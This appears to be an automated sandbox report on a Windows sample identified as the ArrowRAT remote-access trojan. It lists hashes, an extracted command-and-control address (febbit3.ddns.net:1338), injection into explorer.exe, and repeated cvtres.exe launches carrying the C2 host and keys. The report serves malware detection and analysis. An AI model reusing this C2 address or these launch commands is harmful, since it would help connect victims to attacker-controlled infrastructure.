Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
129s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
11/09/2023, 02:00
Behavioral task
behavioral1
Sample
869e6e56d6c9849420442213a468c9fc.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
869e6e56d6c9849420442213a468c9fc.exe
Resource
win10v2004-20230831-en
General
-
Target
869e6e56d6c9849420442213a468c9fc.exe
-
Size
138KB
-
MD5
869e6e56d6c9849420442213a468c9fc
-
SHA1
4f7e64126cd4adf324ee989ffa1efb5870178074
-
SHA256
9f46555944110c0b982e05620a58e6a3828fa6ad8e8dd8f55894e25150207a5e
-
SHA512
db12472b8d74c6f0feafc52d0233f725561de54c6d23687f48b5d8a16c211c20f4abf6bc8057246cc048c958f15f921dff664af49e0c9bb18911839a47ac0a85
-
SSDEEP
3072:Kbvr5mz7Bqh1v59Y08mAjs0Ltel+qOeJHlpV8b+Y/Yd:Kbv9S7BqjjYHdrqkL/
Malware Config
Extracted
arrowrat
5T74S3
febbit3.ddns.net:1338
Y5EJ2C
Signatures
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 2744 1448 WerFault.exe 27 -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000_Classes\Local Settings explorer.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
pid Process 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe 1448 869e6e56d6c9849420442213a468c9fc.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 1448 869e6e56d6c9849420442213a468c9fc.exe Token: SeShutdownPrivilege 2448 explorer.exe Token: SeShutdownPrivilege 2448 explorer.exe Token: SeShutdownPrivilege 2448 explorer.exe Token: SeShutdownPrivilege 2448 explorer.exe Token: SeShutdownPrivilege 2448 explorer.exe Token: SeShutdownPrivilege 2448 explorer.exe Token: SeShutdownPrivilege 2448 explorer.exe Token: SeShutdownPrivilege 2448 explorer.exe Token: SeShutdownPrivilege 2448 explorer.exe Token: SeShutdownPrivilege 2448 explorer.exe Token: SeShutdownPrivilege 2448 explorer.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe -
Suspicious use of SendNotifyMessage 17 IoCs
pid Process 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe 2448 explorer.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 1448 wrote to memory of 2448 1448 869e6e56d6c9849420442213a468c9fc.exe 28 PID 1448 wrote to memory of 2448 1448 869e6e56d6c9849420442213a468c9fc.exe 28 PID 1448 wrote to memory of 2448 1448 869e6e56d6c9849420442213a468c9fc.exe 28 PID 2448 wrote to memory of 2392 2448 explorer.exe 30 PID 2448 wrote to memory of 2392 2448 explorer.exe 30 PID 2448 wrote to memory of 2392 2448 explorer.exe 30 PID 1448 wrote to memory of 3012 1448 869e6e56d6c9849420442213a468c9fc.exe 29 PID 1448 wrote to memory of 3012 1448 869e6e56d6c9849420442213a468c9fc.exe 29 PID 1448 wrote to memory of 3012 1448 869e6e56d6c9849420442213a468c9fc.exe 29 PID 1448 wrote to memory of 3012 1448 869e6e56d6c9849420442213a468c9fc.exe 29 PID 1448 wrote to memory of 2224 1448 869e6e56d6c9849420442213a468c9fc.exe 31 PID 1448 wrote to memory of 2224 1448 869e6e56d6c9849420442213a468c9fc.exe 31 PID 1448 wrote to memory of 2224 1448 869e6e56d6c9849420442213a468c9fc.exe 31 PID 1448 wrote to memory of 2224 1448 869e6e56d6c9849420442213a468c9fc.exe 31 PID 1448 wrote to memory of 2632 1448 869e6e56d6c9849420442213a468c9fc.exe 32 PID 1448 wrote to memory of 2632 1448 869e6e56d6c9849420442213a468c9fc.exe 32 PID 1448 wrote to memory of 2632 1448 869e6e56d6c9849420442213a468c9fc.exe 32 PID 1448 wrote to memory of 2632 1448 869e6e56d6c9849420442213a468c9fc.exe 32 PID 1448 wrote to memory of 2640 1448 869e6e56d6c9849420442213a468c9fc.exe 33 PID 1448 wrote to memory of 2640 1448 869e6e56d6c9849420442213a468c9fc.exe 33 PID 1448 wrote to memory of 2640 1448 869e6e56d6c9849420442213a468c9fc.exe 33 PID 1448 wrote to memory of 2640 1448 869e6e56d6c9849420442213a468c9fc.exe 33 PID 1448 wrote to memory of 2716 1448 869e6e56d6c9849420442213a468c9fc.exe 34 PID 1448 wrote to memory of 2716 1448 869e6e56d6c9849420442213a468c9fc.exe 34 PID 1448 wrote to memory of 2716 1448 869e6e56d6c9849420442213a468c9fc.exe 34 PID 1448 wrote to memory of 2716 1448 869e6e56d6c9849420442213a468c9fc.exe 34 PID 1448 wrote to memory of 2720 1448 869e6e56d6c9849420442213a468c9fc.exe 35 PID 1448 wrote to memory of 2720 1448 869e6e56d6c9849420442213a468c9fc.exe 35 PID 1448 wrote to memory of 2720 1448 869e6e56d6c9849420442213a468c9fc.exe 35 PID 1448 wrote to memory of 2720 1448 869e6e56d6c9849420442213a468c9fc.exe 35 PID 1448 wrote to memory of 2740 1448 869e6e56d6c9849420442213a468c9fc.exe 36 PID 1448 wrote to memory of 2740 1448 869e6e56d6c9849420442213a468c9fc.exe 36 PID 1448 wrote to memory of 2740 1448 869e6e56d6c9849420442213a468c9fc.exe 36 PID 1448 wrote to memory of 2740 1448 869e6e56d6c9849420442213a468c9fc.exe 36 PID 1448 wrote to memory of 2772 1448 869e6e56d6c9849420442213a468c9fc.exe 37 PID 1448 wrote to memory of 2772 1448 869e6e56d6c9849420442213a468c9fc.exe 37 PID 1448 wrote to memory of 2772 1448 869e6e56d6c9849420442213a468c9fc.exe 37 PID 1448 wrote to memory of 2772 1448 869e6e56d6c9849420442213a468c9fc.exe 37 PID 1448 wrote to memory of 2712 1448 869e6e56d6c9849420442213a468c9fc.exe 39 PID 1448 wrote to memory of 2712 1448 869e6e56d6c9849420442213a468c9fc.exe 39 PID 1448 wrote to memory of 2712 1448 869e6e56d6c9849420442213a468c9fc.exe 39 PID 1448 wrote to memory of 2712 1448 869e6e56d6c9849420442213a468c9fc.exe 39 PID 1448 wrote to memory of 2648 1448 869e6e56d6c9849420442213a468c9fc.exe 38 PID 1448 wrote to memory of 2648 1448 869e6e56d6c9849420442213a468c9fc.exe 38 PID 1448 wrote to memory of 2648 1448 869e6e56d6c9849420442213a468c9fc.exe 38 PID 1448 wrote to memory of 2648 1448 869e6e56d6c9849420442213a468c9fc.exe 38 PID 1448 wrote to memory of 2744 1448 869e6e56d6c9849420442213a468c9fc.exe 40 PID 1448 wrote to memory of 2744 1448 869e6e56d6c9849420442213a468c9fc.exe 40 PID 1448 wrote to memory of 2744 1448 869e6e56d6c9849420442213a468c9fc.exe 40 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe"C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\system32\ctfmon.exectfmon.exe3⤵PID:2392
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 5T74S3 febbit3.ddns.net 1338 Y5EJ2C2⤵PID:3012
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 5T74S3 febbit3.ddns.net 1338 Y5EJ2C2⤵PID:2224
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 5T74S3 febbit3.ddns.net 1338 Y5EJ2C2⤵PID:2632
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 5T74S3 febbit3.ddns.net 1338 Y5EJ2C2⤵PID:2640
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 5T74S3 febbit3.ddns.net 1338 Y5EJ2C2⤵PID:2716
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 5T74S3 febbit3.ddns.net 1338 Y5EJ2C2⤵PID:2720
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 5T74S3 febbit3.ddns.net 1338 Y5EJ2C2⤵PID:2740
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 5T74S3 febbit3.ddns.net 1338 Y5EJ2C2⤵PID:2772
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 5T74S3 febbit3.ddns.net 1338 Y5EJ2C2⤵PID:2648
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 5T74S3 febbit3.ddns.net 1338 Y5EJ2C2⤵PID:2712
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1448 -s 6642⤵
- Program crash
PID:2744
-